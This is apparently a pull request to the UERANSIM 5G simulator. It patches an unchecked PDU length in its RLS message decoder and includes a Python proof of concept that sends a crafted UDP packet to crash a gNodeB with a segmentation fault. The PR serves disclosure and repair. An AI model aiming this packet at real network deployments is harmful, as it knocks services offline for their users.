### PR TITLE
Malformed PDU Length leads to Segmentantion fault

### DIFF
--- a/src/lib/rls/rls_pdu.cpp
+++ b/src/lib/rls/rls_pdu.cpp
@@ -93,7 +93,7 @@ std::unique_ptr<RlsMessage> DecodeRlsMessage(const OctetView &stream)
         if (pduLength > 16384)
             return nullptr;
         
-        res->pdu = stream.readOctetString(stream.read4I());
+        res->pdu = stream.readOctetString(pduLength);
         return res;
     }
     else if (msgType == EMessageType::PDU_TRANSMISSION_ACK)

--- a/src/lib/rls/rls_pdu.cpp
+++ b/src/lib/rls/rls_pdu.cpp
@@ -88,6 +88,11 @@ std::unique_ptr<RlsMessage> DecodeRlsMessage(const OctetView &stream)
         res->pduType = static_cast<EPduType>((uint8_t)stream.read());
         res->pduId = stream.read4UI();
         res->payload = stream.read4UI();
+
+        int pduLength = stream.read4I();
+        if (pduLength > 16384)
+            return nullptr;
+        
         res->pdu = stream.readOctetString(stream.read4I());
         return res;
     }

--- a/src/utils/octet_view.cpp
+++ b/src/utils/octet_view.cpp
@@ -9,6 +9,8 @@
 #include "octet_view.hpp"
 #include "octet_string.hpp"
 
+#include <stdexcept>
+
 OctetView::OctetView(const OctetString &data) : data(data.data()), index(0), size(data.length())
 {
 }
@@ -19,8 +21,10 @@ OctetView::OctetView(const uint8_t *data, size_t size) : data(data), index(0), s
 
 OctetString OctetView::readOctetString(int length) const
 {
-    if (length == 0 || index + length > size)
+    if (length == 0)
         return {};
+    else if (index + length > size)
+        throw std::out_of_range("Invalid arguments for readOctetString");
 
     std::vector<uint8_t> v{data + index, data + index + length};
     index += length;

--- a/src/utils/octet_view.cpp
+++ b/src/utils/octet_view.cpp
@@ -19,7 +19,7 @@ OctetView::OctetView(const uint8_t *data, size_t size) : data(data), index(0), s
 
 OctetString OctetView::readOctetString(int length) const
 {
-    if (length == 0 || length >= 20871)
+    if (length == 0 || index + length > size)
         return {};
 
     std::vector<uint8_t> v{data + index, data + index + length};

--- a/src/utils/octet_view.cpp
+++ b/src/utils/octet_view.cpp
@@ -19,7 +19,7 @@ OctetView::OctetView(const uint8_t *data, size_t size) : data(data), index(0), s
 
 OctetString OctetView::readOctetString(int length) const
 {
-    if (length == 0)
+    if (length == 0 || length >= 20871)
         return {};
 
     std::vector<uint8_t> v{data + index, data + index + length};


### PR DESCRIPTION
## Affected versions
3.2.6 >=

## Steps to reproduce
i) Build and setup UERANSIM v3.2.6 gNodeB following the installation guide from the wiki (https://github.com/aligungr/UERANSIM/wiki/Installation).
ii) Adjust the appropriate values and run the following python script 
```python
import socket

GNB_HOST = '127.0.0.1'
GNB_PORT = 4997
RLS_VERSION = b'\x03\x02\x06'

rls_sti = b'\x48\x5a\x86\x7a\x58\xf9\xba\xd4'
rls_pduType = b'\x01'
rls_rrcMsgType = b'\x00\x00\x00\x00\x00\x00\x00\x01'

# PDU Length = 20871
rls_pduLength = b'\x00\x00\x51\x87'

def poc(packet, ip, port):
    udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    try:
        udp_socket.sendto(packet, (ip, port))
        print('Payload sent successfully')
    except Exception as e:
        print('Error:', e)
    finally:
        udp_socket.close()

if __name__ == '__main__':
	payload = b'\x03'
	payload += RLS_VERSION
	payload += b'\x06'
	payload += rls_sti
	payload += rls_pduType
	payload += rls_rrcMsgType
	payload += rls_pduLength

	poc(payload, GNB_HOST, GNB_PORT)
```
## Core flaw
https://github.com/aligungr/UERANSIM/blob/85a0fbfdd166da84c39ed5b4a5435afd40725878/src/utils/octet_view.cpp#L20-L28
The flaw arises in `src/utils/octet_view.cpp` on line 25, where a vector is initialized. The end of the range for this initialization is influenced by the variable length, which is determined by the user sending the packet. Consequently, setting length to a very large value, specifically 20871 or higher, can lead to exceeding the maximum size of the vector or attempting to access data beyond its bounds.

## Fix
A possible fix is to control the value of the variable length, by limiting its size to a maximum number of 20870.